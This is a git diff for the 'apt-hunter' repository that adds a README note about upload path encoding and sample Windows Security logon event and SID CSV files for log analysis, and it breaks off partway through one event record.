diff --git a/README.md b/README.md index caf4ef0..68c4643 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,3 @@ # apt-hunter - +- When you upload the file path depth of 2 or more layers, please be sure to note that the file upload path '/' will be translated into the url '%2F' which will create a new folder! Be sure to pay attention! +- 当你上传的文件路径深度在2层及以上时,请一定要注意文件上传路径'/' 会被url 翻译为 '%2F' 这样会新建一个文件夹!一定要注意! \ No newline at end of file diff --git a/source/samples/EventID_Frequency_Analysis.xls b/source/samples/EventID_Frequency_Analysis.xls new file mode 100644 index 0000000..881d74b Binary files /dev/null and b/source/samples/EventID_Frequency_Analysis.xls differ diff --git a/source/samples/Sample_Collected-SIDS.csv b/source/samples/Sample_Collected-SIDS.csv new file mode 100644 index 0000000..4428ecd --- /dev/null +++ b/source/samples/Sample_Collected-SIDS.csv @@ -0,0 +1,19 @@ +User,SID +01566S-WIN16-IR$,S-1-5-18 +ANONYMOUS LOGON,S-1-5-7 +IEUser,S-1-5-21-3461203602-4096304019-2269080069-1000 +Administrator,S-1-5-21-308926384-506822093-3341789130-500 +samir,S-1-5-21-308926384-506822093-3341789130-220106 +02694W-WIN10$,S-1-5-21-308926384-506822093-3341789130-84104 +Administrator,S-1-5-21-81107902-1099128984-1836738286-500 +EXCHANGE$,S-1-5-21-2895268558-4179327395-2773671012-1108 +IEUser,S-1-5-21-3583694148-1414552638-2922671848-1000 +lgrove,S-1-5-21-308926384-506822093-3341789130-101606 +a-jbrown,S-1-5-21-308926384-506822093-3341789130-1106 +user01,S-1-5-21-1587066498-1489273250-1035260531-1106 +Administrator,S-1-5-21-1587066498-1489273250-1035260531-500 +Administrator,S-1-5-21-1587066498-1489273250-1035260531-500 +sshd_server,S-1-5-21-3583694148-1414552638-2922671848-1002 +LOCAL SERVICE,S-1-5-19 +NETWORK SERVICE,S-1-5-20 +admin01,S-1-5-21-1587066498-1489273250-1035260531-1108 diff --git a/source/samples/Sample_Logon_Events.csv b/source/samples/Sample_Logon_Events.csv new file mode 100644 index 0000000..b0b9d60 --- /dev/null +++ b/source/samples/Sample_Logon_Events.csv @@ -0,0 +1,13814 @@ +Date and Time,timestamp,Event ID,Account Name,Account Domain,Logon Type,Logon Process,Source IP,Workstation Name,Computer Name,Channel,Original Event Log +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 